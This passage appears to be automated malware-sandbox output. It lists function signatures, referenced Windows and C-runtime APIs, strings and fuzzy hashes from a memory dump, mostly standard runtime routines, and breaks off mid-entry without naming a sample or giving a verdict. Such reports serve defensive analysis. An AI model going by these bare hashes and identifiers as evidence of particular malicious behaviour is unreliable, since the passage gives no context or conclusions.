                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: -
                                • API String ID: 4036615347-2547889144
                                • Opcode ID: 481aa69b74d3a6aa89a8a9d955ccbf932033b26336d53b7502a7f5b2fc9200cf
                                • Instruction ID: 52ef52402468bc85807e555e4c019aac06af382c11199f196725ea5cf7924b8e
                                • Opcode Fuzzy Hash: 481aa69b74d3a6aa89a8a9d955ccbf932033b26336d53b7502a7f5b2fc9200cf
                                • Instruction Fuzzy Hash: DE71123272479596DB24CF29E65476EBBB1F799BE0F444229DF9A47B98DB7CC0008B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 55840bd3c244df5959a8c050c48eb46802d46997e9644a149587fe03188317b0
                                • Instruction ID: 3257dd594e29b13dd5217dbd16bb6e1c3b979e1e07d5f2ee70c3763fe8e52ce3
                                • Opcode Fuzzy Hash: 55840bd3c244df5959a8c050c48eb46802d46997e9644a149587fe03188317b0
                                • Instruction Fuzzy Hash: BCA1BA36B18A80D9EB08CFB9D4A07EC2762F75878CF818625DE5917F49DB79C15AC300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CryptReleaseContext.ADVAPI32 ref: 011D8A45
                                • _Init_thread_footer.LIBCMT ref: 011D8AAE
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ContextCryptInit_thread_footerRelease
                                • String ID:
                                • API String ID: 1427515656-0
                                • Opcode ID: 3575e120a3558df12a3e8c9702b725a7828682a5b6599af4753e5638506abc28
                                • Instruction ID: 0e9e2a46cad949cece3866de0094c92913aafdaebfcb69121e2728dce370f246
                                • Opcode Fuzzy Hash: 3575e120a3558df12a3e8c9702b725a7828682a5b6599af4753e5638506abc28
                                • Instruction Fuzzy Hash: FA115E75311B4183EF1DEB1AF8A03A96760FB94B98F88512ACA1E07765DF38C4A1C702
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (<C$P<C
                                • API String ID: 0-3525259974
                                • Opcode ID: be82ec8f3cd3ea304d604ceed3dd8833e4e9992f504069b9030de34d152dd267
                                • Instruction ID: c8440d76b4044dc296e8d42462d68ccd023d13b17ac00491d15b9919f338c625
                                • Opcode Fuzzy Hash: be82ec8f3cd3ea304d604ceed3dd8833e4e9992f504069b9030de34d152dd267
                                • Instruction Fuzzy Hash: 5941BD72215BC086EB258B66F8407DABBA0F799BD4F454125DF9D07B58EFB8C145C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: COMSPEC$cmd.exe
                                • API String ID: 0-2256226045
                                • Opcode ID: e0331f4e58cee9d14b25038fb14f05cba7f5a65daf6b9e7f454a2629538b6daa
                                • Instruction ID: c8a013f048fe05cba9b49158b020a601ddfe21441a82ec56f436e1bb8a5e8ffe
                                • Opcode Fuzzy Hash: e0331f4e58cee9d14b25038fb14f05cba7f5a65daf6b9e7f454a2629538b6daa
                                • Instruction Fuzzy Hash: 4A31A032B20B61E9EB14EFB5E840AAD37B1BB98754F885526DF0957B54DF34C064C350
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0122CC38: GetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CC47
                                  • Part of subcall function 0122CC38: SetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CCE5
                                • EnumSystemLocalesW.KERNEL32(?,?,?,0123999F,?,00000000,00000092,?,?,00000000,?,01229A39), ref: 01239252
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem
                                • String ID:
                                • API String ID: 2417226690-0
                                • Opcode ID: b8648c27c25c964ee0f8cf7798ae941272704674d3a91e0b843f18d5ee29cab1
                                • Instruction ID: 1714e2ef7fa680ee35fb1a6c0c03997c42a2500e19aff5fc750723494c5b0e79
                                • Opcode Fuzzy Hash: b8648c27c25c964ee0f8cf7798ae941272704674d3a91e0b843f18d5ee29cab1
                                • Instruction Fuzzy Hash: CF11E6B3A24A45CADF158F6AE0807AC7B60F391FE8F448116CB6643391DAB4C6E2C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0122CC38: GetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CC47
                                  • Part of subcall function 0122CC38: SetLastError.KERNEL32(?,?,?,0121CB13,?,?,00000000,0122332C), ref: 0122CCE5
                                • EnumSystemLocalesW.KERNEL32(?,?,?,0123995B,?,00000000,00000092,?,?,00000000,?,01229A39), ref: 01239302
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem
                                • String ID:
                                • API String ID: 2417226690-0
                                • Opcode ID: 730cd26796e7bff0811a1d80205c31fe7aabd2e406ac1bf3a00b5e94cab6ba72
                                • Instruction ID: 1b614521c496ad6718e703bf4799adcf9600ea48831ea05a8c50cc0d3df4d6ee
                                • Opcode Fuzzy Hash: 730cd26796e7bff0811a1d80205c31fe7aabd2e406ac1bf3a00b5e94cab6ba72
                                • Instruction Fuzzy Hash: 210126B2B2468587EF108F5AF4807ED76A6E782BA8F45D322D771472C4DBB884D1C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EnumSystemLocalesW.KERNEL32(?,?,00000000,0122D441,?,?,?,?,?,?,?,?,00000000,01238800), ref: 0122CFFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: EnumLocalesSystem
                                • String ID:
                                • API String ID: 2099609381-0
                                • Opcode ID: dc7cf5062bfdf0f2ce6208961b348bec5b7c70b2fb3070be2d4a985db3ddff48
                                • Instruction ID: b27c43a5d4606a51f4f84575d600a6f3a3932a9eaffb5fe9e3fb4db208d7db2b
                                • Opcode Fuzzy Hash: dc7cf5062bfdf0f2ce6208961b348bec5b7c70b2fb3070be2d4a985db3ddff48
                                • Instruction Fuzzy Hash: CAF037B6300A4087E704DB29F8907E933A1FBA8BD0F948125DA5983364DF3CC4718700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: 0
                                • API String ID: 3215553584-4108050209
                                • Opcode ID: e609f9993503d708d295c22c9d032845bca0f418b98de7f9e3721618729ccc0c
                                • Instruction ID: 9800dfe448d74f468ec662103e334c083f0036f4826103e0fe6ec723dbf05c53
                                • Opcode Fuzzy Hash: e609f9993503d708d295c22c9d032845bca0f418b98de7f9e3721618729ccc0c
                                • Instruction Fuzzy Hash: 5851322237478686EB29CE2DA2003AE6BD2F7B5B58F480115CFA51B71DCB65C44FC706
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: 0
                                • API String ID: 3215553584-4108050209
                                • Opcode ID: e9d33caecbe63b45b5f7e9047a6116cd6ae9056d49a43a9866efb8997ed04e83
                                • Instruction ID: bde25a01c915690d21ab552fddcf27016e90b51cd42f9f1d98e326385d90f135
                                • Opcode Fuzzy Hash: e9d33caecbe63b45b5f7e9047a6116cd6ae9056d49a43a9866efb8997ed04e83
                                • Instruction Fuzzy Hash: 885125122386874AEB3DCE2D52003BA6BD2A7A2B88F481502DFA19B76DC775C44FC745
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3827717455-0
                                • Opcode ID: 5bbd22f4e8c1bb0aeffa8d0cd555779ef8be5709ae3460e6b360b14eace9ce33
                                • Instruction ID: 4fb056d6d9728e366cf55c50c0391209c18b6b7f40b32a2b90614b999cdd4484
                                • Opcode Fuzzy Hash: 5bbd22f4e8c1bb0aeffa8d0cd555779ef8be5709ae3460e6b360b14eace9ce33
                                • Instruction Fuzzy Hash: FEB1C4663246B2A5DF21DF6AD8107BE27A1F795B8CF844026DF8987758EF38C185C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 87fcff3c69630de4493288d823b5efbbcabeb222c5ddddd91e60e692ecbc5de9
                                • Instruction ID: edd6d8f8587a583d103c2f4254e828bdc6f9610c2785fd11aec012f75309f522
                                • Opcode Fuzzy Hash: 87fcff3c69630de4493288d823b5efbbcabeb222c5ddddd91e60e692ecbc5de9
                                • Instruction Fuzzy Hash: 7891BF63B15FDA81EE068F2DC0456EC6B20F786F98F599712CF9927756EB28C259C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c394be84e82488f20a703532dc20868d5f6caa6992903e6e360133112e6796a
                                • Instruction ID: 5a65fdbf1bc71dad8ca4d74326395e743b1b4b913a0d4de389d6515e7c1b285e
                                • Opcode Fuzzy Hash: 1c394be84e82488f20a703532dc20868d5f6caa6992903e6e360133112e6796a
                                • Instruction Fuzzy Hash: D661222733020396DB39EE2D9250BBA2BE2F764B48F8451269FA65771CC739C84EC705
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: e2a8eb29a9566205e5f9674b7030a44a268c8149eb4276e6dea55927fb05ed36
                                • Instruction ID: 2aac008c69e8dc7e8caf06cd909aead401d3127ce73a47e278ef7adc0c7e30fd
                                • Opcode Fuzzy Hash: e2a8eb29a9566205e5f9674b7030a44a268c8149eb4276e6dea55927fb05ed36
                                • Instruction Fuzzy Hash: AE41AC76320A6482EB14CF2AD9246ADB7A1B758FE4F499426DE1D87B18EF3CC0568300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 691b92efca09ed07461b468d70a8f6a4df31e5521ed69559dbed0b92475516dc
                                • Instruction ID: 6e6b91a784ce6d8eed7a88cc49e23fc424a7c1b8bf92d4f69557c98c121f4c19
                                • Opcode Fuzzy Hash: 691b92efca09ed07461b468d70a8f6a4df31e5521ed69559dbed0b92475516dc
                                • Instruction Fuzzy Hash: A031E233714B8886DB148F6AE48028DBB55F7D5B94F485229DF8D47B58CBB9D448CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01216F41
                                • DName::operator+.LIBVCRUNTIME ref: 01216F79
                                • DName::operator+.LIBVCRUNTIME ref: 01216FB3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                • API String ID: 2943138195-1201493255
                                • Opcode ID: 9a03841b66abb32ecb92ccf829765cb9c3667303ca4ee9a7d48b91da1f0a52d0
                                • Instruction ID: 23d627effa117f5b9fc9544df1cd9fc19af5fd85a9012692ddcddb4346ca2051
                                • Opcode Fuzzy Hash: 9a03841b66abb32ecb92ccf829765cb9c3667303ca4ee9a7d48b91da1f0a52d0
                                • Instruction Fuzzy Hash: 41E17E72B30B5699EB14CB68D8813FC37B2B725788F904516CF199BA5CEBB4C698C341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 0122D9C7
                                • try_get_function.LIBVCRUNTIME ref: 0122D9E6
                                  • Part of subcall function 0122D02C: GetProcAddress.KERNEL32(?,?,FFFFFFFF,0122D55A,?,?,8000000000000000,0122CDFE,?,?,8000000000000000,012223C9), ref: 0122D184
                                • try_get_function.LIBVCRUNTIME ref: 0122DA05
                                  • Part of subcall function 0122D02C: LoadLibraryExW.KERNEL32(?,?,FFFFFFFF,0122D55A,?,?,8000000000000000,0122CDFE,?,?,8000000000000000,012223C9), ref: 0122D0CF
                                  • Part of subcall function 0122D02C: GetLastError.KERNEL32(?,?,FFFFFFFF,0122D55A,?,?,8000000000000000,0122CDFE,?,?,8000000000000000,012223C9), ref: 0122D0DD
                                  • Part of subcall function 0122D02C: LoadLibraryExW.KERNEL32(?,?,FFFFFFFF,0122D55A,?,?,8000000000000000,0122CDFE,?,?,8000000000000000,012223C9), ref: 0122D11F
                                • try_get_function.LIBVCRUNTIME ref: 0122DA24
                                  • Part of subcall function 0122D02C: FreeLibrary.KERNEL32(?,?,FFFFFFFF,0122D55A,?,?,8000000000000000,0122CDFE,?,?,8000000000000000,012223C9), ref: 0122D158
                                • try_get_function.LIBVCRUNTIME ref: 0122DA43
                                • try_get_function.LIBVCRUNTIME ref: 0122DA62
                                • try_get_function.LIBVCRUNTIME ref: 0122DA81
                                • try_get_function.LIBVCRUNTIME ref: 0122DAA0
                                • try_get_function.LIBVCRUNTIME ref: 0122DABF
                                • try_get_function.LIBVCRUNTIME ref: 0122DADE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                • API String ID: 3255926029-3252031757
                                • Opcode ID: 7585d0567fdd294c583a42d41aa903fbf03d01104119da3bf02b01f95e114b69
                                • Instruction ID: d265cb93d104ab7e52542fd429ac75555a37c718447eb2e9af751a93f70806b4
                                • Opcode Fuzzy Hash: 7585d0567fdd294c583a42d41aa903fbf03d01104119da3bf02b01f95e114b69
                                • Instruction Fuzzy Hash: 7E314070121E5AF1EB08EBA4EE987E527A3E754344FC05017D109971B4DFBC8A6AC385
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01219EC9
                                • DName::operator+.LIBVCRUNTIME ref: 01219F02
                                • DName::operator+.LIBVCRUNTIME ref: 01219FD6
                                • DName::operator+.LIBVCRUNTIME ref: 01219FE7
                                • DName::operator+.LIBVCRUNTIME ref: 0121A04A
                                • DName::operator+.LIBVCRUNTIME ref: 0121A05A
                                • DName::operator+.LIBVCRUNTIME ref: 0121A0A6
                                • DName::operator+.LIBVCRUNTIME ref: 0121A0B8
                                • DName::operator+.LIBVCRUNTIME ref: 0121A22B
                                • DName::operator+.LIBVCRUNTIME ref: 0121A2AB
                                • DName::operator+.LIBVCRUNTIME ref: 0121A2BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: `anonymous namespace'
                                • API String ID: 2943138195-3062148218
                                • Opcode ID: 31d8ef730bdaf5b22ad12ff0b4ac6e10897e176a6cd940772bc24ff70795f61c
                                • Instruction ID: e7c576acccfebd64c7fa1494db2e1f3b428ad0fecac0ea83188ddd1e7eef7e1c
                                • Opcode Fuzzy Hash: 31d8ef730bdaf5b22ad12ff0b4ac6e10897e176a6cd940772bc24ff70795f61c
                                • Instruction Fuzzy Hash: 31D19E72625BC19ADB11CF68E8803ED7BF0F7A9788F948116DB8917B28DB78C564C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183F93
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183F9F
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183FA5
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183FAB
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183FB1
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 01183FB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn
                                • String ID: :@$#$', stored '$', trying to retrieve '$0@@$NameValuePairs: type mismatch for '$`@@
                                • API String ID: 3668304517-3741202374
                                • Opcode ID: d40053da3a8cdad3bb006c880aed1161ee1f52fd1961ba55709aa5901593527e
                                • Instruction ID: 1fe3d6d3d7480b9d619ab466c580b719c9f65442635574e020fa9970f001dff8
                                • Opcode Fuzzy Hash: d40053da3a8cdad3bb006c880aed1161ee1f52fd1961ba55709aa5901593527e
                                • Instruction Fuzzy Hash: AFD1B273A14B8586EB04DB68E84039D7BB1F755BA8F548714DBA807BE9DB78C0D4C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01218681
                                • DName::operator+.LIBVCRUNTIME ref: 0121875D
                                • DName::operator+.LIBVCRUNTIME ref: 012187A6
                                • DName::operator+.LIBVCRUNTIME ref: 012187B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID:
                                • API String ID: 2943138195-0
                                • Opcode ID: 471388ae3911e271b0c5b6845a9db620e753916221b41f142d64b17751cd655f
                                • Instruction ID: 5603059c205f8694fa334f40f5c31f5b524c1526703cbec32dcd9eff5a3d678a
                                • Opcode Fuzzy Hash: 471388ae3911e271b0c5b6845a9db620e753916221b41f142d64b17751cd655f
                                • Instruction Fuzzy Hash: 26F19877B20B829EEB11DFA8E4902ED3BB1E36478CB844416DB4967B1CDB74C659C380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011ADCDD
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011ADD02
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011ADD2D
                                • std::_Facet_Register.LIBCPMT ref: 011ADDA5
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011ADDC8
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011ADDF2
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011ADE2D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011ADE52
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011ADE7D
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011ADF18
                                  • Part of subcall function 011AEB40: std::_Lockit::_Lockit.LIBCPMT ref: 011AEBBE
                                  • Part of subcall function 011AEB40: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 011AEC11
                                • std::_Facet_Register.LIBCPMT ref: 011ADEF5
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011ADF42
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_Register$Locinfo::_Locinfo_ctor
                                • String ID:
                                • API String ID: 59747551-0
                                • Opcode ID: ed5d7af78074351e268692a4d771668f6caea9990c3a2c4ced6594b3d44028f1
                                • Instruction ID: 8fc8d6cd30d3f79b297c8245bcaf147f6e055b91c457fa1b6118a1176133c004
                                • Opcode Fuzzy Hash: ed5d7af78074351e268692a4d771668f6caea9990c3a2c4ced6594b3d44028f1
                                • Instruction Fuzzy Hash: 17717D36204F4182EB19DF59F44036ABBA1FB98BD4F884626DB9D47BA8DF38C161C741
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                • API String ID: 0-4167119577
                                • Opcode ID: d60ca2fbe722911927df823af8a7bba25a82945c62a8b0c5a8b6ab598cff0573
                                • Instruction ID: 60f31d8b5042ddfbf3b7fe48a3d61def08b662de21ec3338352ffe450b07048d
